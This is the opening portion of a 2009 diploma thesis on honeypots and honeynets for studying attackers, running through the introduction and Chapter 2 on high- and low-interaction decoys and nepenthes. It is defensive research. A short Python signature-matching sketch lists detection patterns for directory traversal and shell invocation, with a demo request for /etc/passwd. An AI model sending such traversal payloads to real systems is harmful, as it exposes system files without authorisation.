Using Honeypots to Capture and Analyze
Malicious Activities on the Internet
A Diploma Thesis by Stefan Vömel
August 2009
First Examiner:
Prof. Dr.-Ing. Felix C. Freiling
Second Examiner: Prof. Dr.-Ing. Wolfgang Effelsberg
Advisor:
Dr. Thorsten Holz
Declaration of Honor
I hereby declare that I have prepared this diploma thesis without the help of third parties and
using only the stated sources and aids. All passages taken from
the sources have been marked as such. This thesis
has not been submitted in the same or a similar form to any other examination authority.
Mannheim, August 2009
Stefan Vömel
Abstract
A honeypot is “an information system resource whose value lies in unauthorized or illicit use
of this resource” (see Spitzner, 2003g,a). It is intentionally designed to be insecure and serves as an
electronic bait to study the behavior of adversaries or protect an organization against Internet
threats. Due to these characteristics, a honeypot complements traditional, more defense-oriented
solutions such as firewalls or intrusion detection systems. However, the technology is
also challenging: On the one hand, setting up a decoy can be a complex and time-consuming
task. On the other hand, a compromised honeypot may pose a significant risk to unaffected
third parties if the activities of the intruder are not properly anticipated.
In the scope of this thesis, we illustrate the development process of a so-called Live CD that
implements a pre-configured, fully working electronic bait. With the help of our CD, numerous
honeypots can be easily deployed within a short amount of time. The decoys are executed in
a secured environment and, thus, can safely capture system probes and penetration attempts,
particularly by self-spreading worms, viruses, and other types of autonomously propagating
malware.
In the second part of this thesis, we present the architecture of our own honeynet, i.e., a
specially monitored and controlled network of electronic baits. A honeynet facilitates collecting
more extensive and expressive information about computer criminals. Thereby, we are able to
gain a deep insight into the underground community and better understand the tools, tactics,
and motives of attackers.
Summary (Zusammenfassung)
A honeypot is an information system resource whose value lies in the unauthorized or
illicit use of this resource (cmp. Spitzner, 2003g,a). As a deliberately insecure
“electronic bait”, it makes it possible to study the behavior of malicious attackers
or to detect potential threats from the Internet. Owing to these characteristics,
a honeypot can also be used for the indirect protection of enterprises and complements
classic, more defense-oriented security solutions such as firewalls or early warning systems.
The use of an electronic bait, however, involves certain challenges: On the one hand,
setting it up can be laborious and time-consuming. On the other hand, a compromised
honeypot may pose a considerable risk to uninvolved third parties
if the activities of the attacker are not sufficiently counteracted.
In this diploma thesis, we therefore present a so-called Live CD with which
pre-configured, fully functional baits can be deployed within a short time.
Since the systems are executed in a secured environment,
intrusion attempts, especially by self-spreading
worms, viruses, and other malicious programs, can be observed and recorded safely.
In the second part of this thesis, we illustrate the architecture of a honeynet, i.e.,
a specially monitored and controlled network of individual electronic baits. A
honeynet facilitates a more extensive and more meaningful collection of information
about computer criminals. We are thereby able to gain a comprehensive insight into an
underground movement of the Internet and to better understand the tools, tactics, and motives of the
attackers.
Contents
1 Introduction
2 Honeypot Technology
2.1 Introduction to Honeypots
2.2 High-Interaction Honeypots
2.3 Low-Interaction Honeypots
2.4 Example of an Advanced Low-Interaction Honeypot
2.5 Deployment Options for Honeypots
2.6 Summary
3 Honeynet Technology
3.1 Historical Implementations of Honeynets
3.2 GenII Honeynets
3.2.1 Data Control Implementations
3.2.2 Data Capture Implementations
3.3 GenIII Honeynets
3.4 Virtual Honeynets and Future Implementations
3.5 Summary
4 Development of a Live CD-Based Honeypot
4.1 Overview about Popular Live CD Distributions
4.2 Selection Model for the Live CD Distributions
4.2.1 Overview about the Decision Attributes
4.2.2 Calculation of the Decision Weights
4.2.3 Overview about the Scoring Model
4.2.4 Selection of an Adequate Candidate CD
4.2.5 Summary of the Methodology
4.3 Development and Remastering Process of the Live CD
4.3.1 Technical Architecture of Slax
4.3.2 Project Specifications for the Live CD
4.3.3 Illustration of the Remastering Process of the Live CD
4.3.4 Capturing Autonomously Spreading Malware with the Live CD
4.3.5 Summary
5 Implementation, Deployment, and Analysis of a Honeynet
5.1 Overview about the Architecture of the Honeynet and the System Environment
5.1.1 Technical Specification of the Honeypots
5.1.2 Deployment of the Honeywall
5.1.3 Preparation of the System Environment
5.1.4 Summary of the Implementation and Deployment Process
5.2 Overview about the Collected Honeynet Data
5.2.1 Interactions with the Honeynet
5.2.2 Common Attacks on the Honeynet
5.3 Selected Attacks on the Honeynet
5.3.1 Attack on the Microsoft Windows Honeypot
5.3.2 Attack on the Linux Honeypot
5.4 Analysis of an Underground Communication Channel
5.4.1 Overview about the Captured Data
5.4.2 Analysis of the Labeled Data
5.4.3 Classification of the Entire Text Corpora
5.4.4 Noticeable Characteristics of the Underground Market
5.5 Summary
6 Synopsis and Conclusion
A Configuration Script for the Nepenthes Honeypot
B Boot Options of the Live CD
References
List of Figures
2.1 User Interface of the Low-Interaction Honeypot Specter
2.2 Architecture of the Low-Interaction Honeypot nepenthes
2.3 Setup and Architecture of a Virtual Honeypot
2.4 Architecture of User-Mode Linux
2.5 Illustration of the Bridged Networking Functionality in VMWare
3.1 Overview about the Honeynet Architecture
3.2 Architecture of a GenI Honeynet
3.3 Architecture of a GenII Honeynet
3.4 Network Filtering Capabilities of the Honeynet Gateway
3.5 Illustration of a Full and a Half-Open TCP Handshake
3.6 Packet Drop Mode (PDM) of Snort Inline
3.7 Redirection of System Calls in the Sebek Monitoring Software
3.8 Covert Data Channel Used by the Sebek Monitoring Software
3.9 Example of a Hybrid Virtual Honeynet
3.10 Example of a Distributed Honeynet
4.1 Selection Process for the Live CD Distributions
4.2 Example of an Ordinal Rating Scale
4.3 Boot Sequence of the Slax Live CD
4.4 Illustration of the Union File System
4.5 Functionality of the Live CD-Based Honeypot
4.6 Overview about the Remastering Process
4.7 Illustration of the GNU Configure and Build System
4.8 Directory Structure of the Secured Live CD Environment
4.9 Honeypot Configuration Interface of the Live CD
4.10 Architecture of the Notification System on the Live CD
4.11 Overview about the Recompilation Process of the Kernel
4.12 Two-Factor Authentication Process of the SSH Service
4.13 Components of the KDE Platform
4.14 User Interface of the Live CD
4.15 Origin and Intensity of Malware Attacks
4.16 Number of Detected Malware Downloads and Submissions per Day
4.17 Detection Rates of 32 Antivirus Vendors
4.18 Individual Performance of 32 Antivirus Vendors
5.1 Main Screen of the Walleye Web Management Interface
5.2 Overview about the Network Flows from/to the Honeynet
5.3 Example of an Intrusion Attempt on a Honeypot
5.4 Example of a Trojaned System Service
5.5 Restoring a Captured FTP Session with Wireshark
5.6 Analyzing Web-Based Attacks with DataEcho
5.7 System Architecture of the Honeynet
5.8 Origins of Machines Interacting with the Honeynet
5.9 Classification of Attacks Reported by the Snort Intrusion Detection System
5.10 Request of the DFind Vulnerability Scanner
5.11 Geographical Spread of PopUp Spam Attacks
5.12 Packet Dump of the Slammer Worm
5.13 Origins of Password Brute Force Attacks
5.14 User Accounts Targeted By Password Brute Force Attacks
5.15 Schematic Overview of a Distributed Denial of Service Attack
5.16 Number of UDP Packets Captured per Day in the Honeynet
5.17 Timeline of a UDP Packet Storm on a Honeypot
5.18 Analysis of a UDP Packet Storm
5.19 User Interface of the c99 shell Trojan Backdoor
5.20 Analyzing Encrypted Network Traffic with Wireshark
5.21 Subversion of a System With the Hacker Defender Rootkit
5.22 Custom Login Banner of the Attacker
5.23 Timeline of the Attack on the Windows Honeypot
5.24 Flowchart Diagram of the Captured Attack Tools
5.25 Timeline of the Attack on the Linux Honeypot
5.26 Number of Messages Sent per Day to the Communication Channel
5.27 Number of Active Users per Day in the Communication Channel
5.28 Distribution of Offers and Requests for Hacking-Related Goods and Services
5.29 Types of Hacking-Related Goods and Services
5.30 Process of a Machine Learning-Based Text Classification
5.31 Estimated Distribution of Offers and Requests in the Text Corpora
5.32 Active Lifetime of Nicks in the Communication Channel
List of Tables
2.1 Advantages and Disadvantages of Low-Interaction and High-Interaction Honeypots
3.1 List of Possible netfilter Actions
3.2 List of Connection States as Distinguished by IPTables
3.3 Metrics Used by the p0f Passive Fingerprinting Utility
4.1 Main Characteristics of Live CD Distributions
4.2 Attribute Ranks and Weights for the Candidate CDs
4.3 Attribute Values for the Candidate CDs
4.4 Attribute Ratings and Weighted Sums for the Live CDs
4.5 Weighted Sums for the Live CDs after the Sensitivity Analysis
4.6 Base Modules Included in the Slax Live CD
4.7 Custom-Built Modules of the nepenthes Low-Interaction Honeypot
4.8 Dependency Libraries Required for the nepenthes Low-Interaction Honeypot
4.9 Overview about the Run Levels of the Operating System
4.10 Important User and System-Wide Directories of the KDE Platform
4.11 Top Malware Samples Captured with the Live CD
5.1 Technical Specification of the Honeypots
5.2 Important Configuration Options of the Honeywall
5.3 Top 10 Countries Interacting with the Honeynet
5.4 Origins of PopUp Spam attacks
5.5 Top 30 Passwords Used During Brute Force Attacks
5.6 Countries Involved in Different Distributed Denial of Service Attacks
5.7 Additional Components of the Serv-U FTP Server that are Required to Establish a Secured Connection
5.8 Attack Tools Used During the Compromise of the Windows Honeypot
5.9 Attack Tools Used During the Compromise of the Linux Honeypot
5.10 Average Precision and Recall Values of the Training Data
Listings
3.1 Sample Rule for the Packet Replace Mode (PRM) of Snort Inline
3.2 Example of a Swatch Configuration File
3.3 Sample Rule of the Snort Intrusion Detection System
4.1 Preparation of the System Environment
4.2 Sample Boot Label of the Isolinux Boot Loader
4.3 Creating a Kernel Logo for the Live CD
4.4 Compiling the Kernel for the Live CD
4.5 Mounting the Initial Ram to Adapt the linuxrc Start File
4.6 Example of a TCP Wrapper Configuration
5.1 Restoring Windows Executables with PEHunter
5.2 Example of a Network Scan for Instances of the phpMyAdmin Database Administration Program
5.3 Example of a PopUp Spam Message
5.4 Manipulation of the System Database
5.5 Installation of the Serv-U FTP Server
5.6 Modification of the System Registry
5.7 System Hardening Operations on the Compromised Honeypot
5.8 Extract of Keystrokes Captured by Sebek
5.9 Setup Script of a Trojaned Secure Shell Server
5.10 Backdoor Mechanism Implemented in the Secure Shell Server
5.11 Exploit for the Webmin and Usermin Web Applications
5.12 Sample Advertisement for Hacking-Related Goods
5.13 Sample Advertisements and Requests for Stolen Credit Cards and Credit Card-Related Information
5.14 Sample Advertisements and Requests for Cashiers, Confirmers, and Drops
5.15 Sample Advertisements and Requests for Bank Logins and Online Accounts
5.16 Sample Advertisements and Requests for Hacked Hosts
5.17 Example of a Full Personal Record
5.18 Sample Advertisements and Requests for Personal Data
5.19 Sample Advertisements and Requests for Hardware Equipment
5.20 Sample Messages Indicating Distrust in Other Market Participants
1 Introduction
In the course of slightly less than one and a half decades, the Internet has evolved into
one of the major information and communication platforms: According to a study by
the Miniwatts Marketing Group (2008), the number of Internet users worldwide has
risen from 16 million in 1995 to more than 1.5 billion in 2009. By the year 2010, up to
1.65 billion people are expected to browse web pages, read e-mail, visit chat rooms, and
participate in online discussion forums.
In parallel, the commercial role of the World Wide Web (WWW), as the Internet is
also frequently called (cmp. Tanenbaum, 2003), has become more and more important
as well: For instance, in Germany alone, revenues in electronic commerce have more
than doubled to 438 billion euros within a period of three years (see Pols, 2007), and
almost one out of three Europeans has ordered goods or services online in the last
twelve months (see Eurostats, 2008).
Unfortunately, with the increasing use and financial importance of the Internet, computer
systems and network architectures have become valuable targets for cyber criminals, too.
Human miscreants as well as automated viruses, worms, and other types of
autonomously propagating malware attempt to exploit vulnerabilities in system platforms
and software applications in order to gain control of the underlying machine.
At the time of this writing, more than 44,000 security weaknesses have been discovered
(see CERT, 2009). What is worse, as a survey by the Computer Security Institute (CSI)
shows, 43% of the interviewed business organizations have already fallen prey to an
attack (Richardson, 2008, pp. 13-16). On average, the respondents suffered a loss of almost
$290,000.
To keep up with current and future threats, many corporations consider security
one of the top goals in the information technology (IT) sector (cmp. Capgemini,
2008). To a great degree, however, implementations are based on traditional, purely
defense-oriented technologies, e.g., firewalls, intrusion detection systems (IDSs), and
encryption routines (see Honeynet Project, 2006). The main objective of these approaches
is to recognize malicious activities in time and protect the infrastructure of the
enterprise as well as possible. Getting to know the tools, tactics, and motives of intruders
is of lesser priority. As a result, the role of administrators is restricted to reaction,
and blackhats succeed in gaining informational advantages in the long term (cmp.
Honeynet Project, 2004b). For this reason, IT professionals have more recently begun to
emphasize proactive measures as well and have suggested deploying so-called honeypots.
Honeypots are closely watched electronic baits that are intentionally designed to be
insecure. Because they form potentially attractive targets, attackers are lured into a trap
when they try to compromise a machine: While they break into the decoy, all their actions
are recorded and analyzed. Thus, it is possible to learn the offensive techniques of
adversaries in detail, develop appropriate counter-strategies, and prevent similar system
penetrations in the future (cmp. Spitzner, 2001a).
Outline of the Thesis
This thesis is structured as follows: In Chapter 2, we introduce the concept of honeypots
in detail. We illustrate the fundamental characteristics of different types of decoys and
depict their respective advantages and disadvantages. Furthermore, we briefly describe
common deployment approaches for electronic baits that have proven useful in practice
for capturing malicious activities.
As we will see, multiple honeypots may be combined in a so-called honeynet to observe
attacks not only on a single system, but on a network-wide scale. Even though
this procedure may help create more accurate profiles of adversaries, we also need to
implement sophisticated control and monitoring facilities in order to mitigate risks for
uninvolved third parties as far as possible. We give an overview of these activities
as well as of historical, modern, and future honeynet technologies in Chapter 3.
At the time of this writing, deploying larger numbers of electronic baits can be a
complex and time-consuming task (see also Sadasivam et al., 2005). For this reason,
we develop a bootable Live CD that runs completely in memory and comprises a
pre-configured, working honeypot. The development and evaluation process of the device
is the subject of Chapter 4. With the help of our CD, numerous decoys may be easily and
comfortably connected to the Internet within a short amount of time. Thereby, we are
able to collect threats such as autonomously propagating worms and viruses on a large
scale.
In addition, we set up several machines that offer access to full-featured operating
systems, services, and applications. Since the individual components contain certain,
well-known security weaknesses, the machines form attractive targets, particularly for
human miscreants. A selection of specific attacks that we have witnessed in the course
of this thesis is presented in Chapter 5. We conclude with a short summary of our work
in Chapter 6 and propose various opportunities for future research.
Results of the Thesis
As we have already indicated, the Live CD that we have developed in the course
of the thesis significantly facilitates the configuration and deployment process
of electronic baits. Security professionals are able to connect a fully working decoy to
the Internet and start monitoring probes and compromises within minutes.
Each threat that is captured with the CD is automatically sent to a central analysis
station for further investigation. Reports that are generated by the station may help
assess the potential risk on the Internet that is caused by common worms, viruses, and
other types of autonomously spreading malware. Moreover, the collected samples may
be used to evaluate the performance of virus scanners and similar security-related
software products. In our preliminary test with more than 1,000 unique malicious binaries,
the detection rates of different anti-virus vendors varied, in part dramatically.
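Such an evaluation amounts to computing, for each scanner, the share of collected samples that it flags as malicious. The following minimal sketch illustrates the calculation; the function name, the scanner names, and the sample identifiers are hypothetical and do not reflect the data or tooling of the thesis.

```python
from typing import Dict, Set


def detection_rates(samples: Set[str],
                    detections: Dict[str, Set[str]]) -> Dict[str, float]:
    """Map each scanner to the fraction of samples it flagged as malicious."""
    if not samples:
        raise ValueError("at least one sample is required")
    # Only count detections that refer to samples in the evaluated set.
    return {scanner: len(flagged & samples) / len(samples)
            for scanner, flagged in detections.items()}


if __name__ == "__main__":
    # Hypothetical toy data: four samples, two scanners.
    toy_samples = {"s1", "s2", "s3", "s4"}
    toy_detections = {
        "scanner_a": {"s1", "s2", "s3", "s4"},
        "scanner_b": {"s1"},
    }
    print(detection_rates(toy_samples, toy_detections))
```

Comparing the resulting fractions across scanners makes differences in detection performance directly visible.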
In addition, we have deployed and maintained a small honeynet with three
electronic baits over a period of slightly more than five months. During this time, we
have captured more than 21.5 Gb of raw network traffic and monitored a large number
of probes and penetration attempts on the individual decoys.
After examining the incidents in detail, we illustrate typical attack strategies that security
professionals are likely to be confronted with in practice as well. Furthermore, we present
two selected compromises, one of a Linux-based and one of a Windows-based honeypot, and
outline the tools, tactics, and motives of the intruders. Thereby, we are able to catch a
glimpse of the underground community and gain a better understanding of the adversaries
operating in cyberspace today.
Acknowledgements
First and foremost, I would like to thank Prof. Dr. Felix Freiling for giving me the
opportunity to work in the field of IT security at the Laboratory for Dependable Distributed Systems, University of Mannheim. I would also like to express my deepest
gratitude to my advisor, Dr. Thorsten Holz. He always gave me valuable advice and
feedback, indicated new research directions, and did not leave any of my questions unanswered.
Many thanks go to Johannes Stüttgen as well. Without his assistance, I would not have
been able to deploy my Live CD and start capturing autonomously spreading malware.
The same holds true for Viviana Nichica who was irreplaceable while translating the
source code of several Romanian attack tools.
Acknowledgments are also owed to Jürgen Jaap for providing me with the necessary
hardware equipment and Ben Stock for setting up my personal interface to the analysis
station.
In addition, I greatly benefited from the dedication of the members of the Honeynet
Project. In particular, I appreciate the support of Robert McMillen and Earl Sammons.
Last but not least, I would like to say thank you to Nicholas Chantler for sending me
his PhD thesis and helping me gain insight into the minds of adversaries.
2 Honeypot Technology
As we have indicated in the introduction of this thesis, business corporations in
particular focus on traditional, defense-oriented techniques in order to protect their resources
from threats on the Internet. For example, administrators frequently deploy firewalls,
intrusion detection systems (IDSs), and intrusion prevention systems (IPSs) to identify
suspicious activities at the network perimeter (cmp. Deloitte, 2009). With the help of
signatures, i.e., patterns for well-known attacks, the devices are able to discover a broad
range of penetration attempts (see Paxson, 1998). Many implementations also look
for anomalies in network data and attempt to recognize unusual traffic flows that are
potential signs of an incident (see Barford et al., 2002; Leckie and Kotagiri, 2002; Jung
et al., 2004).
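To make the notion of a signature concrete, the following minimal sketch matches packet payloads against a small table of byte patterns. The signature names and patterns are hypothetical placeholders chosen for illustration; they are not taken from Snort or any other real rule set, and real systems use far richer rule languages.

```python
from typing import Dict, List

# Hypothetical signatures: name -> byte pattern expected in a malicious payload.
SIGNATURES: Dict[str, bytes] = {
    "directory-traversal": b"../../",
    "shell-invocation": b"/bin/sh",
}


def match_signatures(payload: bytes,
                     signatures: Dict[str, bytes] = SIGNATURES) -> List[str]:
    """Return the sorted names of all signatures whose pattern occurs in payload."""
    return sorted(name for name, pattern in signatures.items()
                  if pattern in payload)


if __name__ == "__main__":
    print(match_signatures(b"GET /../../etc/passwd HTTP/1.0"))
    print(match_signatures(b"GET /index.html HTTP/1.0"))
```

A payload that matches none of the known patterns passes unnoticed, which is why signature matching alone cannot recognize attacks that have not been seen before.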
In spite of these benefits, Richardson (2008, p. 17) argues that the “measures that
organizations have taken against their attackers (...) are fundamentally imperfect”. For
instance, both intrusion detection and intrusion prevention systems suffer from
several inherent problems: First, the systems generate a significant amount of false
positives, i.e., legitimate traffic is erroneously reported as being malicious (see Zhang and
Leckie, 2006). Due to this misclassification, false positives are a serious issue as “they
diminish the value and urgency of real alerts” (see Timm, 2001). What is worse, said
technologies also have difficulties in reliably detecting specific types of probes and attacks
(see Levchenko et al., 2004) or may even be completely circumvented (see Handley et al.,
2001; Chung et al., 1995; Ptacek and Newsham, 1998; Wagner and Soto, 2002).
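The effect of false positives on the value of alerts can be illustrated with a short calculation based on Bayes' rule. The input values below are assumed for illustration only; they are not measurements from the cited studies.

```python
def alert_precision(attack_share: float,
                    detection_rate: float,
                    false_positive_rate: float) -> float:
    """Fraction of raised alerts that correspond to real attacks."""
    # Share of all connections that are attacks and raise an alert.
    true_alerts = attack_share * detection_rate
    # Share of all connections that are benign but raise an alert anyway.
    false_alerts = (1.0 - attack_share) * false_positive_rate
    return true_alerts / (true_alerts + false_alerts)


if __name__ == "__main__":
    # Assumed values: 1 in 1,000 connections is malicious, 99% of attacks
    # are detected, and 1% of benign connections trigger an alert.
    print(round(alert_precision(0.001, 0.99, 0.01), 3))
```

Under these assumptions, fewer than one alert in ten refers to a real attack, even though the detector itself appears accurate. This is the sense in which false positives reduce the urgency of genuine alerts.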
To properly cope with these factors, IT professionals have recently started to propose
the use of electronic baits in addition to more conventional methods of combatting
computer crime. The characteristics of these so-called honeypots are presented in detail
in the following sections.
Outline of the Chapter
In Section 2.1, we introduce the concept of honeypots, outline their value, and illustrate
their field of application. As we will see, we may distinguish two basic types of
electronic baits. Their individual advantages and disadvantages are explained in Sections
2.2 and 2.3, followed by a brief description of a particularly powerful decoy that is
capable of capturing self-propagating worms, viruses, and other malicious software programs
on a large scale. Last but not least, we sketch two common deployment options for
honeypots and conclude with a short summary of our findings.
2.1 Introduction to Honeypots
In accordance with the original posting on the honeypot mailing list, we define a
honeypot as “an information system resource whose value lies in unauthorized or illicit use
of that resource” (see Spitzner, 2003g,a). It acts as an electronic bait for computer
criminals that is intentionally designed to be probed, attacked, and compromised (see
Spitzner, 2002).
It is important to note that, according to the definition, such a resource may
potentially be any digital entity, e.g., a database or a document (cmp. Honeynet Project,
2004b). In the scope of this thesis, however, we use the term honeypot to refer to a single
computer system. Any other resource that serves as a decoy is termed a honeytoken for
clarity (cmp. Spitzner, 2003f).
Honeypots have no production value, i.e., they offer no productive services that are of
interest to legitimate system users (see also Spitzner, 2001a). Consequently, any transactions and interactions with these machines are suspicious and likely reflect unauthorized
or malicious activity. For this reason, data sets collected with a honeypot as well as
the number of encountered false positives are significantly smaller compared to traditional monitoring devices such as IDSs and IPSs. That is why security professionals may
manage and analyze incident-related information more easily (cmp. Honeynet Project,
2004b). In addition, as “any activity with the honeypot is an anomaly”, we can detect
and identify previously unknown intrusion strategies, because “new or unseen attacks
stand out” (see Honeynet Project, 2004b, p. 19). For these purposes, we also record
all traffic flows entering or leaving a decoy with several software applications that are
provided and maintained by members of the Honeynet Project. As we will see in Chapter 5, these applications are extremely powerful and even permit monitoring encrypted
network sessions. Thereby, we are able to recover the steps of adversaries and learn
more about their specific tools, tactics, and motives. This research-oriented approach
facilitates coming to a better understanding of the underground community in the long
term and encourages finding proper countermeasures against miscreants (see Spitzner,
2002). On the other hand, when deployed within a production environment, honeypots
may help recognize threats in time and protect resources of an organization. Thus, they
directly contribute to the security of an enterprise (cmp. Spitzner, 2001a, 2003e).
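Because a honeypot has no production value, the detection rule described above reduces to a single address comparison: every flow that touches the decoy is worth inspecting. A minimal sketch, assuming flow records with hypothetical field names and IP addresses from the documentation ranges:

```python
from dataclasses import dataclass
from ipaddress import ip_address
from typing import Iterable, List


@dataclass(frozen=True)
class Flow:
    """Hypothetical flow record; the field names are illustrative assumptions."""
    src: str
    dst: str
    dst_port: int


# Hypothetical honeypot address (taken from a documentation range).
HONEYPOT_ADDRESSES = frozenset({ip_address("192.0.2.10")})


def suspicious_flows(flows: Iterable[Flow],
                     honeypots: frozenset = HONEYPOT_ADDRESSES) -> List[Flow]:
    """Return every flow that enters or leaves a honeypot, in input order."""
    return [flow for flow in flows
            if ip_address(flow.src) in honeypots
            or ip_address(flow.dst) in honeypots]


if __name__ == "__main__":
    observed = [
        Flow("198.51.100.7", "192.0.2.10", 445),    # inbound probe
        Flow("203.0.113.5", "203.0.113.9", 80),     # unrelated traffic
        Flow("192.0.2.10", "198.51.100.7", 6667),   # outbound from the decoy
    ]
    for flow in suspicious_flows(observed):
        print(flow)
```

No signature or traffic model is involved, so the rule does not depend on the attack having been seen before. Outbound flows are reported as well, since they may indicate that a decoy has been compromised.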
Depending on the level of risk that is associated with an electronic bait and the possibilities of interaction, we distinguish high-interaction and low-interaction honeypots.
The major characteristics of these two types are presented in the following.
2.2 High-Interaction Honeypots
High-interaction honeypots are frequently based on commercial off-the-shelf (COTS)
computer systems and offer attackers complete operating systems as well as fully functional applications and services to interact with (cmp. Provos and Holz, 2007). Thus,
when this type of electronic bait is compromised, a blackhat may gain complete control
of the machine, upload her own tools, and modify files and system settings. Due to this
unrestricted access and a high level of freedom, security professionals are able to collect
in-depth information about the incident, the intentions of the intruder as well as her motives (cmp. Honeynet Project, 2000b,a). For instance, high-interaction honeypots have
proven useful for studying identity theft-related phishing attacks and automated credit
card frauds in the past (see Watson et al., 2005; Honeynet Project, 2003a). In addition,
as these decoys make “no assumptions on how an attacker will behave” (see Spitzner,
2003a), they are even capable of capturing so-called 0-day exploits, i.e., exploits that
have never been encountered “in the wild” before (cmp. Honeynet Project, 2004b).
However, in spite of these benefits, several aspects must be taken into consideration
before starting to deploy high-interaction honeypots: First, the technology is rather
complex to set up and configure, and maintenance can be extremely time-consuming (see
Spitzner, 2002). Second, some efforts have been made in the underground community
more recently to detect the presence of a monitored environment. For example, various
authors succeeded in reliably identifying data capture facilities running on a decoy (see
Corey, 2003, 2004; Dornseif et al., 2004a). Other approaches seek to find anomalies in
the system setup and attempt to distinguish honeypots from real machines (see Holz
and Raynal, 2005b; Provos and Holz, 2007).
When a device has successfully been detected, it is likely that adversaries will either completely avoid it in the future or insert bogus data in order to pollute log files and make
a later investigation more difficult (see Spitzner, 2004). In this case, its value is dramatically reduced, and “the game is almost over” (see Holz and Raynal, 2005b, p. 30).
Furthermore, because of the inherent open architecture of high-interaction electronic
baits, the external environment is constantly exposed to a certain level of threat (see
Spitzner, 2001b). For example, adversaries may use a compromised decoy as a starting
point for further malicious activities. That is why each honeypot must be carefully
administered and closely watched in order to mitigate risks for unaffected third parties
as best as possible. Participants of the Honeynet Project have developed a number of
utilities that greatly facilitate the latter tasks. We will give a detailed overview of
these utilities in Chapter 3.
2.3 Low-Interaction Honeypots
The level of risk as described above can be significantly reduced when using low-interaction
honeypots. These electronic baits only emulate specific services, i.e., intruders are tricked
into believing that they are interacting with a real machine, while in reality, they operate in a closely watched,
simulated environment (cmp. Spitzner, 2002). For instance, a low-interaction honeypot
may provide a virtual FTP server attackers can connect to. When a session is initiated
and the adversary attempts to log in, her IP address as well as her authentication credentials are recorded for information gathering purposes. Any other additional requests
such as uploading or downloading files are, however, rejected (cmp. Spitzner, 2003a).
Thus, in comparison to high-interaction honeypots, the possibilities of interaction are
substantially reduced. Consequently, administrators stay in control of their machine
and do not need to be afraid of a total system compromise. In parallel, the risk for the
external environment is effectively minimized.
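The behavior of such an emulated FTP service can be sketched in a few lines of Python. The following is only a minimal illustration under our own assumptions: the class name `FakeFtpSession` and the exact reply texts are hypothetical and are not taken from any of the honeypot products discussed in this chapter. The sketch records the credentials of a login attempt and refuses every other request.

```python
from dataclasses import dataclass, field


@dataclass
class FakeFtpSession:
    """State of one emulated FTP login dialogue (hypothetical helper)."""
    peer_ip: str
    user: str = ""
    captured: list = field(default_factory=list)

    def handle(self, line: str) -> str:
        """Return the reply for a single command line sent by the client."""
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "USER":
            self.user = arg
            return "331 Password required"
        if verb == "PASS":
            # Record who tried which credentials, then refuse the login.
            self.captured.append((self.peer_ip, self.user, arg))
            return "530 Login incorrect"
        if verb == "QUIT":
            return "221 Goodbye"
        # Uploads, downloads, and all other requests are rejected.
        return "530 Please login with USER and PASS"
```

Because no command ever reaches a real file system or shell, the attacker cannot gain a foothold on the host, which reflects the reduced risk described above.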
Low-interaction honeypots are easy to install, configure, and maintain (see Spitzner,
2002). That is why they may be deployed on a large scale without difficulty. For example, in the course of the Leurre.com project1, security professionals have started to set
up numerous platforms with several emulated operating systems in different locations
all over the world. Each platform periodically sends its captured data to a central
database. Thereby, it is possible to generate extensive statistics about attack patterns
and trends at a higher level of abstraction, even though the amount of information collected with a single decoy may be quite limited (see Pouget et al., 2005; Holz, 2006).
Similar approaches have been pursued by other authors to examine the spread of autonomously propagating malware on the Internet (see Provos, 2004; Bächer et al., 2006;
Göbel et al., 2006; Itzel, 2007).
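To illustrate how sparse per-sensor data turns into meaningful statistics once it is merged centrally, consider the following minimal sketch. The report format (a mapping from a sensor name to a list of source address and destination port pairs) is purely our assumption for illustration and does not describe the actual Leurre.com data model.

```python
from collections import Counter


def aggregate_by_port(reports):
    """Merge per-sensor event lists into one table: port -> number of hits.

    `reports` maps a sensor name to a list of (source_ip, dest_port) tuples.
    """
    totals = Counter()
    for _sensor, events in reports.items():
        for _source_ip, dest_port in events:
            totals[dest_port] += 1
    return totals
```

A call such as `aggregate_by_port(reports).most_common(10)` would then list the ten most frequently targeted ports across all platforms.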
On the other hand, due to their simple design, low-interaction honeypots are often
unable to deal with unexpected behavior, i.e., they are not capable of capturing 0-day
exploits or other previously unknown threats. What is worse, they are comparatively
easy to fingerprint: For instance, sophisticated attackers may trigger resource-intensive
operations and examine corresponding response latencies to reveal the true nature of
the decoy (cmp. Provos and Holz, 2007). As we have already explained, the value of the
device decreases considerably in this case.
In spite of these disadvantages, low-interaction honeypots are frequently favored within
a production environment and are particularly popular among organizations in the financial and manufacturing industries (see Honeynet Project, 2004b). The majority of existing
solutions is offered free of charge, e.g., the rather old Deception Toolkit (DTK)2 or the
Tiny Honeypot (thp)3 by George Bakos. Commercial products such as Specter4 usually
permit emulating a larger number of operating systems and services. Their behavior
and appearance can be easily configured and adapted with a comfortable graphical user
interface (see Figure 2.1). Thereby, the deployment process of a decoy may be completed
within a short amount of time.
A more advanced variant of a low-interaction honeypot is the subject of the following
section.
1 see http://www.leurrecom.org/
2 see http://all.net/dtk/download.html
3 see http://www.alpinista.org/thp/
4 see http://www.specter.com/
Figure 2.1: User Interface of the Low-Interaction Honeypot Specter
(Source: NETSEC, 2009)
2.4 Example of an Advanced Low-Interaction
Honeypot
A powerful variant of a low-interaction honeypot is nepenthes5 . It is open source, free
of charge, and is actively maintained by Paul Bächer, Markus Kötter, and several other
security professionals.
Nepenthes is particularly suitable for capturing self-spreading malware on a large
scale, i.e., it is capable of downloading considerable amounts of worms, bots, and other
types of malicious software that are autonomously propagating in the wild (see Provos
and Holz, 2007). For instance, in a preliminary study, Goebel et al. (2007) succeeded
in retrieving more than 2,500 unique malicious binaries in a period of only 8 weeks.
Similar collections may help identify common threats on the Internet, generate statistics
about current attack patterns, and support the development of high-quality detection
signatures for antivirus scanners and other security-related applications.
5 http://nepenthes.carnivore.it/
Figure 2.2: Architecture of the Low-Interaction Honeypot nepenthes
(Source: Bächer et al., 2006)
With respect to its architecture, nepenthes is based on a flexible design and consists of various program modules that are required for capturing and processing the
different malware samples. In particular, Bächer et al. (2006) distinguish vulnerability
modules, shellcode parsing modules, fetch modules, submission modules, and logging modules. Their functionality is briefly illustrated in the following. An overview of the
individual components and their interaction is given in Figure 2.2.
The core of the low-interaction honeypot is formed by a number of vulnerability modules. These modules emulate known security weaknesses in Windows-specific system services, e.g., the Microsoft SQL Server 2000 database management system, the Microsoft
Internet Information Services 5.0 (IIS 5.0) web server, or the Distributed Component
Object Model (DCOM) interface (see Microsoft Corporation, 2002, 2003a,b). It is important to note, however, that nepenthes does not simulate the complete behavior of a
service, but only those parts of the program that are relevant to the vulnerability.
As Wicherski and Holz (2006) point out, these parts are usually sufficient to deceive
malicious binaries and provoke an attack.
